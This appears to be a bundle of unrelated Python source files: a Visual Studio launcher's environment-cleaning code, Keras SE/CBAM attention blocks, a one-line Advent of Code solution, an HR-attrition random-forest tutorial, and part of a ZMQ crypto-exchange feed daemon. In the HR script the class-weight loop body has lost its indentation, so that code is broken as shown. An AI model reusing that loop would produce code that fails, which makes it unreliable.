    REMOVE_LIST = ( 'CommandPromptType',
                    'DevEnvDir',
                    'ExtensionSdkDir',
                    'FSHARPINSTALLDIR',
                    'Framework35Version',
                    'Framework40Version',
                    'FrameworkDIR32',
                    'FrameworkDIR64',
                    'FrameworkDir',
                    'FrameworkVersion32',
                    'FrameworkVersion64',
                    'FrameworkVersion',
                    'HTMLHelpDir',
                    'IFCPATH',
                    'INCLUDE',
                    'LIB',
                    'LIBPATH',
                    'NETFXSDKDir',
                    'Platform',
                    'UCRTVersion',
                    'UniversalCRTSdkDir',
                    'VCIDEInstallDir',
                    'VCINSTALLDIR',
                    'VCToolsInstallDir',
                    'VCToolsRedistDir',
                    'VCToolsVersion',
                    'VSCMD_ARG_HOST_ARCH',
                    'VSCMD_ARG_TGT_ARCH',
                    'VSCMD_ARG_app_plat',
                    'VSCMD_VER',
                    'VSINSTALLDIR',
                    'VSSDKINSTALL',
                    'VisualStudioVersion',
                    'WindowsLibPath',
                    'WindowsSDKLibVersion',
                    'WindowsSDKVersion',
                    'WindowsSDK_ExecutablePath_x64',
                    'WindowsSDK_ExecutablePath_x86',
                    'WindowsSdkBinPath',
                    'WindowsSdkDir',
                    'WindowsSdkVerBinPath',
                    '__DOTNET_ADD_32BIT',
                    '__DOTNET_ADD_64BIT',
                    '__DOTNET_PREFERRED_BITNESS',
                    '__VSCMD_PREINIT_PATH',
                    '__VSCMD_PREINIT_VS150COMNTOOLS',
                    '__VSCMD_PREINIT_VS160COMNTOOLS',
                    '__VSCMD_PREINIT_VS170COMNTOOLS',
                    '__VSCMD_script_err_count',
                    'is_x64_arch',
                    )
    env = dict(nt.environ)
    # Windows env-var names are case-insensitive but this dict is not: map
    # upper-cased names back to the casing actually present.
    km = {k.upper(): k for k in env.keys()}
    for i in ( km[k.upper()] for k in REMOVE_LIST if k.upper() in km ):
        del env[i]
    def _envkey(k):
        # Resolve a name to the casing present in env (or itself if absent).
        return km.get(k.upper(), k)
    env[_envkey('PreferredToolArchitecture')] = 'x64'
    def _read_reg_path(root, subkey):
        # Fetch the raw (unexpanded) 'Path' value under *root*\*subkey*;
        # '' when the key/value is missing.  Fix: close the handle (the
        # original leaked both registry handles).
        h = None
        try:
            h = winreg.OpenKey(root, subkey, 0, winreg.KEY_READ)
            value, t = winreg.QueryValueEx(h, 'Path')
            assert t == winreg.REG_EXPAND_SZ or t == winreg.REG_SZ
            return value
        except WindowsError:
            return ''
        finally:
            if h:
                winreg.CloseKey(h)
    syspath = _read_reg_path(winreg.HKEY_LOCAL_MACHINE,
                             r'SYSTEM\ControlSet001\Control\Session Manager\Environment')
    usrpath = _read_reg_path(winreg.HKEY_CURRENT_USER, r'Environment')
    if syspath and usrpath:
        def _repl(m):
            # Expand %VAR% from env; '%%' -> '%'; unknown vars stay literal.
            v = m.group('var')
            if not v: return '%'
            kv = _envkey(v)
            if kv in env: return env[kv]
            s = m.span('var')
            return m.string[s[0]-1:s[1]+1]
        # Fix: raw string for the pattern -- '\w' in a plain string literal
        # is an invalid escape sequence (SyntaxWarning on modern Python).
        pat = re.compile(r'%(?P<var>\w*)%')
        env[_envkey('Path')] = ';'.join(
            [ pat.sub(_repl, p) for p in ( syspath.split(';') + usrpath.split(';') ) if p ])
    return env
def main():
    """Parse command-line options and exec the selected Visual Studio.

    Returns 1 after --list, 255 on usage errors or --help; a successful
    launch replaces this process via os.execv/execve and does not return.
    """
    devenvs = get_devenv_list()
    devdef = default_devenv(devenvs)
    # Accept both '--vs2019' and '--2019' style long options (plus '--vc6').
    vs_opts = list(devenvs.keys())
    vs_opts += [ i[2:] for i in vs_opts if i.startswith('vs') ]
    if 'msvc6' in devenvs: vs_opts += [ 'vc6' ]
    devsel = ''
    import getopt
    args = []
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'lh',
            [ 'list', 'help', ] + vs_opts)
    except getopt.error as err:
        print(err, file=sys.stderr)
        return 255
    for opt, val in opts:
        if opt in ( '--msvc6', '--vc6' ):
            assert not devsel  # at most one version option allowed
            devsel = 'msvc6'
        elif (opt.startswith('--') and (opt[2:] in devenvs)):
            assert not devsel
            devsel = opt[2:]
        elif (opt.startswith('--') and ('vs' + opt[2:] in devenvs)):
            assert not devsel
            devsel = 'vs' + opt[2:]
        elif opt in ( '-l', '--list' ):
            print_devenvs(devenvs, devdef)
            return 1
        elif opt in ( '-h', '--help' ):
            print(__doc__)
            return 255
    if not devsel: devsel = devdef
    devenv = devenvs[devsel]
    # Remaining args are forwarded to the IDE, each re-quoted.
    if sys.version_info.major < 3 or (sys.version_info.major == 3 and sys.version_info.minor <= 4):
        # On XP where Python's latest version is 3.4, execve() crashes.
        os.execv(devenv, [ '"' + devenv + '"' ] + [ '"' + a + '"' for a in args ])
    else:
        # Replace the current process, handing over a cleaned environment.
        os.execve(devenv, [ '"' + devenv + '"' ] + [ '"' + a + '"' for a in args ], clean_env())
    return 0
if __name__ == '__main__':
    sys.exit(main())
#---eof---
|
from tensorflow.keras.layers import GlobalAveragePooling2D, GlobalMaxPooling2D, Reshape, Dense, multiply, Permute, Concatenate, Conv2D, Add, Activation, Lambda, Conv1D
from tensorflow.keras import backend as K
from tensorflow.keras.activations import sigmoid
from utils import other_transform
import tensorflow as tf
import numpy as np
import math
def attach_attention_module(net, attention_module):
    """Wrap *net* with the requested attention block.

    attention_module: 'se_block', 'cbam_block', or the literal string 'None'
    (which returns the feature map untouched).
    """
    if attention_module == 'None':
        return net
    if attention_module == 'se_block':
        return se_block(net)
    if attention_module == 'cbam_block':
        return cbam_block(net)
    raise Exception("'{}' is not supported attention module!".format(attention_module))
"""
To use original attention block with GlobalAvgPool2D, uncomment line 40 and comment line 42 which has the
other_transform() function for changing the statistic measures and vice-versa.
Measures are:
Standard Deviation- transform='std',
Singular Value Decomposition- transform='svd',
Trace- transform='trace',
Discrete Cosine Transform- transform='dct_dcval'
"""
def se_block(input_feature, ratio=8):
    """Contains the implementation of Squeeze-and-Excitation(SE) block.
    As described in https://arxiv.org/abs/1709.01507.

    ratio: bottleneck reduction factor for the excitation MLP.
    """
    channel_axis = 1 if K.image_data_format() == "channels_first" else -1
    channel = input_feature.shape[channel_axis]
    # Uncomment the line below for original SE_block and comment other_transform() line 42.
    # se_feature = GlobalAveragePooling2D()(input_feature)
    # "Squeeze" step replaced by a custom per-channel statistic; exact
    # semantics live in utils.other_transform -- presumably one scalar per
    # channel, as the Reshape below assumes (TODO confirm).
    se_feature = other_transform(input_feature, channel_axis, transform='trace')
    # transform='std','dct_dcval', 'trace', or 'svd'
    se_feature = Reshape((1, 1, channel))(se_feature)
    assert se_feature.shape[1:] == (1,1,channel)
    # "Excitation": bottleneck MLP ending in a per-channel sigmoid gate.
    se_feature = Dense(channel // ratio,
                       activation='relu',
                       kernel_initializer='he_normal',
                       use_bias=True,
                       bias_initializer='zeros')(se_feature)
    assert se_feature.shape[1:] == (1,1,channel//ratio)
    se_feature = Dense(channel,
                       activation='sigmoid',
                       kernel_initializer='he_normal',
                       use_bias=True,
                       bias_initializer='zeros')(se_feature)
    assert se_feature.shape[1:] == (1,1,channel)
    if K.image_data_format() == 'channels_first':
        se_feature = Permute((3, 1, 2))(se_feature)
    # Scale the input feature map channel-wise by the learned gates.
    se_feature = multiply([input_feature, se_feature])
    return se_feature
# Other statistic measures not supported for CBAM module.
def cbam_block(cbam_feature, ratio=8):
    """Convolutional Block Attention Module (https://arxiv.org/abs/1807.06521):
    channel attention followed by spatial attention, as in the paper."""
    refined = channel_attention(cbam_feature, ratio)
    return spatial_attention(refined)
def channel_attention(input_feature, ratio=8):
    """CBAM channel attention: gate each channel with a two-layer MLP whose
    weights are shared between average- and max-pooled descriptors."""
    channel_axis = 1 if K.image_data_format() == "channels_first" else -1
    channel = input_feature.shape[channel_axis]
    # The two Dense layers are instantiated once and reused for both
    # pooling branches, so their weights are shared.
    shared_layer_one = Dense(channel//ratio,
                             activation='relu',
                             kernel_initializer='he_normal',
                             use_bias=True,
                             bias_initializer='zeros')
    shared_layer_two = Dense(channel,
                             kernel_initializer='he_normal',
                             use_bias=True,
                             bias_initializer='zeros')
    avg_pool = GlobalAveragePooling2D()(input_feature)
    avg_pool = Reshape((1,1,channel))(avg_pool)
    assert avg_pool.shape[1:] == (1,1,channel)
    avg_pool = shared_layer_one(avg_pool)
    assert avg_pool.shape[1:] == (1,1,channel//ratio)
    avg_pool = shared_layer_two(avg_pool)
    assert avg_pool.shape[1:] == (1,1,channel)
    max_pool = GlobalMaxPooling2D()(input_feature)
    max_pool = Reshape((1,1,channel))(max_pool)
    assert max_pool.shape[1:] == (1,1,channel)
    max_pool = shared_layer_one(max_pool)
    assert max_pool.shape[1:] == (1,1,channel//ratio)
    max_pool = shared_layer_two(max_pool)
    assert max_pool.shape[1:] == (1,1,channel)
    # Sum the two descriptors, squash to (0,1) gates, then rescale the input.
    cbam_feature = Add()([avg_pool,max_pool])
    cbam_feature = Activation('sigmoid')(cbam_feature)
    if K.image_data_format() == "channels_first":
        cbam_feature = Permute((3, 1, 2))(cbam_feature)
    return multiply([input_feature, cbam_feature])
def spatial_attention(input_feature):
    """CBAM spatial attention: a 7x7 conv over the channel-wise mean and max
    maps produces a per-position sigmoid gate applied to the input."""
    kernel_size = 7
    if K.image_data_format() == "channels_first":
        channel = input_feature.shape[1]
        # Work in channels_last internally; Permute back before returning.
        cbam_feature = Permute((2,3,1))(input_feature)
    else:
        channel = input_feature.shape[-1]
        cbam_feature = input_feature
    # Collapse channels into two maps: mean and max over the channel axis.
    avg_pool = Lambda(lambda x: K.mean(x, axis=3, keepdims=True))(cbam_feature)
    assert avg_pool.shape[-1] == 1
    max_pool = Lambda(lambda x: K.max(x, axis=3, keepdims=True))(cbam_feature)
    assert max_pool.shape[-1] == 1
    concat = Concatenate(axis=3)([avg_pool, max_pool])
    assert concat.shape[-1] == 2
    cbam_feature = Conv2D(filters = 1,
                          kernel_size=kernel_size,
                          strides=1,
                          padding='same',
                          activation='sigmoid',
                          kernel_initializer='he_normal',
                          use_bias=False)(concat)
    assert cbam_feature.shape[-1] == 1
    if K.image_data_format() == "channels_first":
        cbam_feature = Permute((3, 1, 2))(cbam_feature)
    return multiply([input_feature, cbam_feature])
|
<reponame>twright0/aoc-2021-oneline
from aocd import get_data
from aocd.transforms import lines
from functools import reduce
import json
# AoC 2021 day 18 ("snailfish") solved as a single expression: each number
# becomes a linked binary tree of dicts {'v','depth','up','left','right'};
# explode/split mutate the tree, run_reduction repeats them to a fixed point,
# and magnitude folds the tree as 3*left + 2*right.
nums = lines(get_data(year=2021,day=18))
print((init := (lambda v,d,up: (((i := {}) or True) and
    # init: build a node -- leaves store 'v', list pairs recurse into children
    i.update({'v': v, 'depth': d, 'up': up, 'right': None, 'left': None}
    if type(v) != list else
    {'v': None, 'depth': d, 'up': up,
    'left': init(v[0],d+1,i), 'right': init(v[1],d+1,i)}) or i)
    )) and
    # first_parent: climb upward until we approached from the other side
    (first_parent := (lambda last, curr, direction: (curr
    if ((not curr) or
    curr[direction] is not last) else
    first_parent(curr, curr['up'], direction)))) and
    # descendent: walk down one side until a leaf (node with a value) is hit
    (descendent := (lambda curr, direction: (curr
    if curr['v'] is not None else
    descendent(curr[direction],direction)))) and
    # left_inorder / right_inorder: in-order neighbour leaves of n (or falsy)
    (left_inorder := (lambda n: (
    (parent := first_parent(n, n['up'], 'left')) and
    (descendent(parent['left'], 'right'))
    ))) and
    (right_inorder := (lambda n: (
    (parent := first_parent(n, n['up'], 'right')) and
    (descendent(parent['right'], 'left'))
    ))) and
    # explode: leftmost pair at depth 4 spills its values to the in-order
    # neighbours and becomes a 0 leaf; returns True when something changed
    (explode := (lambda n: ((
    (
    ((nl := left_inorder(n)) or True) and
    ((nr := right_inorder(n)) or True) and
    (nl.update({'v': nl['v'] + n['left']['v']}) if nl is not None else None) or
    (nr.update({'v': nr['v'] + n['right']['v']}) if nr is not None else None) or
    (n.update({'v': 0, 'right': None, 'left': None})) or
    True
    ) if n['v'] is None and n['depth'] == 4 else
    ((explode(n['left']) or explode(n['right']) or False)
    if n['v'] is None else
    (False)))
    ))) and
    # split: leftmost leaf >= 10 becomes a pair (floor, ceil of half)
    (split := (lambda n: (
    (False if n['v'] < 10 else (
    n.update({'left': init(int(n['v']/2), n['depth']+1, n)}) or
    n.update({'right': init((int(n['v']/2)
    if n['v'] % 2 == 0 else
    int(n['v']/2)+1),
    n['depth']+1,n)}) or
    n.update({'v': None}) or
    True)
    )
    if n['v'] is not None else
    (split(n['left']) or split(n['right']) or False)
    ))) and
    # run_reduction: keep exploding/splitting until neither applies
    (run_reduction := lambda n: (
    (state := [n]) and
    reduce(lambda _, n: (state.append(n)
    if explode(n) or split(n) else
    n),
    state, None))) and
    # magnitude: fold the tree as 3*left + 2*right
    (magnitude := (lambda n: n['v'] if n['v'] is not None else (3 * magnitude(n['left']) +
    2 * magnitude(n['right'])))) and
    # incr: bump every node's depth by one (after wrapping in a new root)
    (incr := (lambda n: (n.update({'depth': n['depth']+1}) or
    (incr(n['right']) if n['right'] is not None else True) and
    (incr(n['left']) if n['left'] is not None else True)) and True)) and
    # Fold all input numbers left-to-right: wrap (state, next) in a new root,
    # reduce it, and finally take the magnitude of the result.
    magnitude(reduce(lambda state, num: (
    incr(state) and
    (n2 := init(json.loads(num),0,None)) and
    incr(n2) and
    (new_state := init(0,0,None)) and
    (new_state.update({'right': n2, 'left': state, 'v': None}) or True) and
    (n2.update({'up': new_state}) or True) and
    (state.update({'up': new_state}) or True) and
    run_reduction(new_state) and
    new_state
    ), nums[1:], init(json.loads(nums[0]),0,None)))
)
|
<reponame>PacktPublishing/Extending-Machine-Learning-Algorithms<gh_stars>1-10
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score,classification_report
import matplotlib.pyplot as plt
hrattr_data = pd.read_csv("WA_Fn-UseC_-HR-Employee-Attrition.csv")
print (hrattr_data.head())
hrattr_data['Attrition_ind'] = 0
hrattr_data.loc[hrattr_data['Attrition']=='Yes','Attrition_ind'] = 1
dummy_busnstrvl = pd.get_dummies(hrattr_data['BusinessTravel'], prefix='busns_trvl')
dummy_dept = pd.get_dummies(hrattr_data['Department'], prefix='dept')
dummy_edufield = pd.get_dummies(hrattr_data['EducationField'], prefix='edufield')
dummy_gender = pd.get_dummies(hrattr_data['Gender'], prefix='gend')
dummy_jobrole = pd.get_dummies(hrattr_data['JobRole'], prefix='jobrole')
dummy_maritstat = pd.get_dummies(hrattr_data['MaritalStatus'], prefix='maritalstat')
dummy_overtime = pd.get_dummies(hrattr_data['OverTime'], prefix='overtime')
continuous_columns = ['Age','DailyRate','DistanceFromHome','Education','EnvironmentSatisfaction',
'HourlyRate', 'JobInvolvement', 'JobLevel','JobSatisfaction','MonthlyIncome', 'MonthlyRate', 'NumCompaniesWorked',
'PercentSalaryHike', 'PerformanceRating', 'RelationshipSatisfaction','StockOptionLevel', 'TotalWorkingYears',
'TrainingTimesLastYear','WorkLifeBalance', 'YearsAtCompany', 'YearsInCurrentRole', 'YearsSinceLastPromotion',
'YearsWithCurrManager']
hrattr_continuous = hrattr_data[continuous_columns]
hrattr_continuous['Age'].describe()
hrattr_data['BusinessTravel'].value_counts()
hrattr_data_new = pd.concat([dummy_busnstrvl,dummy_dept,dummy_edufield,dummy_gender,dummy_jobrole,
dummy_maritstat,dummy_overtime,hrattr_continuous,hrattr_data['Attrition_ind']],axis=1)
# Train & Test split
x_train,x_test,y_train,y_test = train_test_split(hrattr_data_new.drop(['Attrition_ind'],axis=1),
hrattr_data_new['Attrition_ind'],train_size = 0.7,random_state=42)
# Decision Tree Classifier
from sklearn.tree import DecisionTreeClassifier
dt_fit = DecisionTreeClassifier(criterion="gini",max_depth=5,min_samples_split=2,min_samples_leaf=1,random_state=42)
dt_fit.fit(x_train,y_train)
print ("\nDecision Tree - Train Confusion Matrix\n\n",pd.crosstab(y_train,dt_fit.predict(x_train),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nDecision Tree - Train accuracy:",round(accuracy_score(y_train,dt_fit.predict(x_train)),3))
print ("\nDecision Tree - Train Classification Report\n",classification_report(y_train,dt_fit.predict(x_train)))
print ("\n\nDecision Tree - Test Confusion Matrix\n\n",pd.crosstab(y_test,dt_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nDecision Tree - Test accuracy:",round(accuracy_score(y_test,dt_fit.predict(x_test)),3))
print ("\nDecision Tree - Test Classification Report\n",classification_report(y_test,dt_fit.predict(x_test)))
# Tuning class weights to analyze accuracy, precision & recall
dummyarray = np.empty((6,10))
dt_wttune = pd.DataFrame(dummyarray)
dt_wttune.columns = ["zero_wght","one_wght","tr_accuracy","tst_accuracy","prec_zero","prec_one",
"prec_ovll","recl_zero","recl_one","recl_ovll"]
zero_clwghts = [0.01,0.1,0.2,0.3,0.4,0.5]
for i in range(len(zero_clwghts)):
clwght = {0:zero_clwghts[i],1:1.0-zero_clwghts[i]}
dt_fit = DecisionTreeClassifier(criterion="gini",max_depth=5,min_samples_split=2,
min_samples_leaf=1,random_state=42,class_weight = clwght)
dt_fit.fit(x_train,y_train)
dt_wttune.loc[i, 'zero_wght'] = clwght[0]
dt_wttune.loc[i, 'one_wght'] = clwght[1]
dt_wttune.loc[i, 'tr_accuracy'] = round(accuracy_score(y_train,dt_fit.predict(x_train)),3)
dt_wttune.loc[i, 'tst_accuracy'] = round(accuracy_score(y_test,dt_fit.predict(x_test)),3)
clf_sp = classification_report(y_test,dt_fit.predict(x_test)).split()
dt_wttune.loc[i, 'prec_zero'] = float(clf_sp[5])
dt_wttune.loc[i, 'prec_one'] = float(clf_sp[10])
dt_wttune.loc[i, 'prec_ovll'] = float(clf_sp[17])
dt_wttune.loc[i, 'recl_zero'] = float(clf_sp[6])
dt_wttune.loc[i, 'recl_one'] = float(clf_sp[11])
dt_wttune.loc[i, 'recl_ovll'] = float(clf_sp[18])
print ("\nClass Weights",clwght,"Train accuracy:",round(accuracy_score(y_train,dt_fit.predict(x_train)),3),"Test accuracy:",round(accuracy_score(y_test,dt_fit.predict(x_test)),3))
print ("Test Confusion Matrix\n\n",pd.crosstab(y_test,dt_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
# Bagging Classifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import BaggingClassifier
dt_fit = DecisionTreeClassifier(criterion="gini",max_depth=5,min_samples_split=2,min_samples_leaf=1,random_state=42,
class_weight = {0:0.3,1:0.7})
bag_fit = BaggingClassifier(base_estimator= dt_fit,n_estimators=5000,max_samples=0.67,max_features=1.0,
bootstrap=True,bootstrap_features=True,n_jobs=-1,random_state=42)
bag_fit.fit(x_train, y_train)
print ("\nBagging - Train Confusion Matrix\n\n",pd.crosstab(y_train,bag_fit.predict(x_train),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nBagging- Train accuracy",round(accuracy_score(y_train,bag_fit.predict(x_train)),3))
print ("\nBagging - Train Classification Report\n",classification_report(y_train,bag_fit.predict(x_train)))
print ("\n\nBagging - Test Confusion Matrix\n\n",pd.crosstab(y_test,bag_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nBagging - Test accuracy",round(accuracy_score(y_test,bag_fit.predict(x_test)),3))
print ("\nBagging - Test Classification Report\n",classification_report(y_test,bag_fit.predict(x_test)))
# Random Forest Classifier
# 5000 depth-5 trees with the same 0.3/0.7 class weighting; bootstrap row
# sampling plus per-split feature subsampling ('auto') decorrelates the trees.
from sklearn.ensemble import RandomForestClassifier
rf_fit = RandomForestClassifier(n_estimators=5000,criterion="gini",max_depth=5,min_samples_split=2,bootstrap=True,
                                max_features='auto',random_state=42,min_samples_leaf=1,class_weight = {0:0.3,1:0.7})
rf_fit.fit(x_train,y_train)
# Train-set diagnostics.
print ("\nRandom Forest - Train Confusion Matrix\n\n",pd.crosstab(y_train,rf_fit.predict(x_train),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nRandom Forest - Train accuracy",round(accuracy_score(y_train,rf_fit.predict(x_train)),3))
print ("\nRandom Forest - Train Classification Report\n",classification_report(y_train,rf_fit.predict(x_train)))
# Held-out test-set performance.
print ("\n\nRandom Forest - Test Confusion Matrix\n\n",pd.crosstab(y_test,rf_fit.predict(x_test),rownames = ["Actuall"],colnames = ["Predicted"]))
print ("\nRandom Forest - Test accuracy",round(accuracy_score(y_test,rf_fit.predict(x_test)),3))
print ("\nRandom Forest - Test Classification Report\n",classification_report(y_test,rf_fit.predict(x_test)))
# Plot of Variable importance by mean decrease in gini
# Rank features by impurity-based importance and plot the top 31 as a
# horizontal bar chart (least important of the top set at the bottom).
model_ranks = pd.Series(rf_fit.feature_importances_,index=x_train.columns, name='Importance').sort_values(ascending=False, inplace=False)
model_ranks.index.name = 'Variables'
top_features = model_ranks.iloc[:31].sort_values(ascending=True,inplace=False)
plt.figure(figsize=(20,10))
ax = top_features.plot(kind='barh')
_ = ax.set_title("Variable Importance Plot")
_ = ax.set_xlabel('Mean decrease in Variance')
_ = ax.set_yticklabels(top_features.index, fontsize=13)
# Random Forest Classifier - Grid Search
# 5-fold cross-validated grid search over forest size / depth / split
# parameters (36 candidates), scored on accuracy.
# NOTE(review): train_test_split is imported but not used in this section.
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split,GridSearchCV
pipeline = Pipeline([
        ('clf',RandomForestClassifier(criterion='gini',class_weight = {0:0.3,1:0.7}))])
parameters = {
            'clf__n_estimators':(2000,3000,5000),
            'clf__max_depth':(5,15,30),
            'clf__min_samples_split':(2,3),
            'clf__min_samples_leaf':(1,2) }
grid_search = GridSearchCV(pipeline,parameters,n_jobs=-1,cv=5,verbose=1,scoring='accuracy')
grid_search.fit(x_train,y_train)
# Report the best cross-validation score and its parameter setting.
print ('Best Training score: %0.3f' % grid_search.best_score_)
print ('Best parameters set:')
best_parameters = grid_search.best_estimator_.get_params()
for param_name in sorted(parameters.keys()):
    print ('\t%s: %r' % (param_name, best_parameters[param_name]))
# Evaluate the refit best estimator on the held-out test set.
predictions = grid_search.predict(x_test)
print ("Testing accuracy:",round(accuracy_score(y_test, predictions),4))
print ("\nComplete report of Testing data\n",classification_report(y_test, predictions))
print ("\n\nRandom Forest Grid Search- Test Confusion Matrix\n\n",pd.crosstab(y_test, predictions,rownames = ["Actuall"],colnames = ["Predicted"]))
|
from functools import wraps as _wraps
from itertools import chain as _chain
import json
from .utils import convert_to, Logger, dec_con
from decimal import Decimal
import pandas as pd
from time import sleep
from datetime import datetime, timezone, timedelta
import zmq
import threading
from multiprocessing import Process
from .exceptions import *
from cryptotrader.utils import send_email
# Module-level switch: when True, FeedDaemon workers log every handled request.
debug = True
# Base classes
class ExchangeConnection(object):
    """Abstract base class for exchange connections.

    Subclasses (live, paper-trading and backtest feeds) must override the
    feed and trade-execution methods below; calling them on the base class
    raises NotImplementedError.

    BUG FIX: the original methods *returned* a NotImplementedError instance
    instead of raising it, so misuse was silently ignored and callers
    received an exception object as the "result".
    """
    # Feed methods
    @property
    def balance(self):
        """Current account balance -- must be overridden."""
        raise NotImplementedError("This class is not intended to be used directly.")

    def returnBalances(self):
        """Return account balances -- must be overridden."""
        raise NotImplementedError("This class is not intended to be used directly.")

    def returnFeeInfo(self):
        """Return maker/taker fee information -- must be overridden."""
        raise NotImplementedError("This class is not intended to be used directly.")

    def returnCurrencies(self):
        """Return the exchange currency listing -- must be overridden."""
        raise NotImplementedError("This class is not intended to be used directly.")

    def returnChartData(self, currencyPair, period, start=None, end=None):
        """Return OHLC candle data -- must be overridden."""
        raise NotImplementedError("This class is not intended to be used directly.")

    # Trade execution methods
    def sell(self, currencyPair, rate, amount, orderType=False):
        """Place a sell order -- must be overridden."""
        raise NotImplementedError("This class is not intended to be used directly.")

    def buy(self, currencyPair, rate, amount, orderType=False):
        """Place a buy order -- must be overridden."""
        raise NotImplementedError("This class is not intended to be used directly.")

    def pair_reciprocal(self, df):
        """Convert an OHLC frame quoted as pair A_B into the reciprocal B_A.

        Each price column becomes 1/price quantized to 8 decimal places;
        the 'high'/'low' and 'volume'/'quoteVolume' columns swap roles.
        """
        df[['open', 'high', 'low', 'close']] = df.apply(
            {col: lambda x: str((Decimal('1') / convert_to.decimal(x)).quantize(Decimal('0E-8')))
             for col in ['open', 'low', 'high', 'close']}, raw=True).rename(columns={'low': 'high',
                                                                                     'high': 'low'}
        )
        return df.rename(columns={'quoteVolume': 'volume', 'volume': 'quoteVolume'})
## Feed daemon
# Server
class FeedDaemon(Process):
    """
    Data Feed server

    Runs as a separate process: a ZMQ ROUTER socket accepts client requests
    on ``addr`` and proxies them over an in-process DEALER socket to a pool
    of REP worker threads.  Each worker parses the text request, forwards it
    to the matching exchange API instance and sends the JSON reply back.
    """
    def __init__(self, api={}, addr='ipc:///tmp/feed.ipc', n_workers=8, email={}):
        """
        :param api: dict: exchange name: api instance
        :param addr: str: client side address
        :param n_workers: int: n threads
        :param email: dict: credentials used by send_email for crash reports
        """
        # NOTE(review): mutable default arguments (api={}, email={}) are
        # shared across instances -- harmless if always passed explicitly,
        # but worth confirming at call sites.
        super(FeedDaemon, self).__init__()
        self.api = api
        self.email = email
        self.context = zmq.Context()
        self.n_workers = n_workers
        self.addr = addr
        # Time-span constants, in seconds.
        self.MINUTE, self.HOUR, self.DAY = 60, 60 * 60, 60 * 60 * 24
        self.WEEK, self.MONTH = self.DAY * 7, self.DAY * 30
        self.YEAR = self.DAY * 365
        # Seed the API nonce from the current UTC timestamp with microsecond
        # resolution (decimal point stripped) so it increases across restarts.
        self._nonce = int("{:.6f}".format(datetime.utcnow().timestamp()).replace('.', ''))

    @property
    def nonce(self):
        """ Increments the nonce"""
        self._nonce += 33
        return self._nonce

    def handle_req(self, req):
        """Parse a whitespace-separated request string.

        Expected format: "<exchange> <method> [args...]".
        Returns False for an empty or one-token request, an
        (exchange, method) tuple for zero-argument calls, or
        (exchange, method, kwargs) for calls with arguments.
        Unrecognised multi-argument methods fall through and
        implicitly return None.
        """
        req = req.split(' ')
        if req[0] == '' or len(req) == 1:
            return False
        elif len(req) == 2:
            return req[0], req[1]
        else:
            # Candle data
            if req[1] == 'returnChartData':
                # 'None' start/end default to the last 24 hours.
                if req[4] == 'None':
                    req[4] = datetime.utcnow().timestamp() - self.DAY
                if req[5] == 'None':
                    req[5] = datetime.utcnow().timestamp()
                call = (
                    req[0],
                    req[1],
                    {
                        'currencyPair': str(req[2]).upper(),
                        'period': str(req[3]),
                        'start': str(req[4]),
                        'end': str(req[5])
                    }
                )
                return call
            if req[1] == 'returnTradeHistory':
                args = {'currencyPair': str(req[2]).upper()}
                if req[3] != 'None':
                    args['start'] = req[3]
                if req[4] != 'None':
                    args['end'] = req[4]
                return req[0], req[1], args
            # Buy and sell orders
            if req[1] == 'buy' or req[1] == 'sell':
                args = {
                    'currencyPair': str(req[2]).upper(),
                    'rate': str(req[3]),
                    'amount': str(req[4]),
                }
                # order type specified?
                try:
                    possTypes = ['fillOrKill', 'immediateOrCancel', 'postOnly']
                    # check type
                    if not req[5] in possTypes:
                        raise ExchangeError('Invalid orderType')
                    args[req[5]] = 1
                except IndexError:
                    # No order type supplied -- plain order.
                    pass
                return req[0], req[1], args
            if req[1] == 'returnDepositsWithdrawals':
                args = {}
                if req[2] != 'None':
                    args['start'] = req[2]
                if req[3] != 'None':
                    args['end'] = req[3]
                return req[0], req[1], args

    def worker(self):
        """REP worker loop: receive a request, call the exchange API, reply JSON."""
        # Init socket
        sock = self.context.socket(zmq.REP)
        sock.connect("inproc://workers.inproc")
        while True:
            try:
                # Wait for request
                req = sock.recv_string()
                Logger.info(FeedDaemon.worker, req)
                # Handle request
                call = self.handle_req(req)
                # Send request to api
                if call:
                    try:
                        # Fresh nonce for every call; dispatch to the api
                        # selected by the request's first token.
                        self.api[call[0]].nonce = self.nonce
                        rep = self.api[call[0]].__call__(*call[1:])
                    except ExchangeError as e:
                        # Exchange-side errors are sent back to the client
                        # as their string representation.
                        rep = e.__str__()
                        Logger.error(FeedDaemon.worker, "Exchange error: %s\n%s" % (req, rep))
                    except DataFeedException as e:
                        rep = e.__str__()
                        Logger.error(FeedDaemon.worker, "DataFeedException: %s\n%s" % (req, rep))
                    if debug:
                        Logger.debug(FeedDaemon.worker, "Debug: %s" % req)
                    # send reply back to client
                    sock.send_json(rep)
                else:
                    raise TypeError("Bad call format.")
            except Exception as e:
                # Unexpected failure: e-mail a crash report, close the socket
                # and let this worker thread die with the exception.
                send_email(self.email, "FeedDaemon Error", e)
                sock.close()
                raise e

    def run(self):
        """Process entry point: bind sockets, spawn workers, run the zmq proxy."""
        try:
            Logger.info(FeedDaemon, "Starting Feed Daemon...")
            # Socket to talk to clients
            clients = self.context.socket(zmq.ROUTER)
            clients.bind(self.addr)
            # Socket to talk to workers
            workers = self.context.socket(zmq.DEALER)
            workers.bind("inproc://workers.inproc")
            # Launch pool of worker threads
            for i in range(self.n_workers):
                thread = threading.Thread(target=self.worker, args=())
                thread.start()
            Logger.info(FeedDaemon.run, "Feed Daemon running. Serving on %s" % self.addr)
            # Blocks forever, shuttling messages between clients and workers.
            zmq.proxy(clients, workers)
        except KeyboardInterrupt:
            clients.close()
            workers.close()
            self.context.term()
# Client
class DataFeed(ExchangeConnection):
    """
    Data feeder for backtesting with TradingEnvironment.

    ZMQ REQ client for FeedDaemon: each public method serialises a text
    request, sends it to the daemon, validates the JSON reply and retries
    failed or timed-out requests with exponential backoff.
    """
    # TODO WRITE TESTS
    # Backoff schedule, in seconds: 1, 2, 4, ..., 128.
    retryDelays = [2 ** i for i in range(8)]

    def __init__(self, exchange='', addr='ipc:///tmp/feed.ipc', timeout=30):
        """
        :param exchange: str: FeedDaemon exchange to query
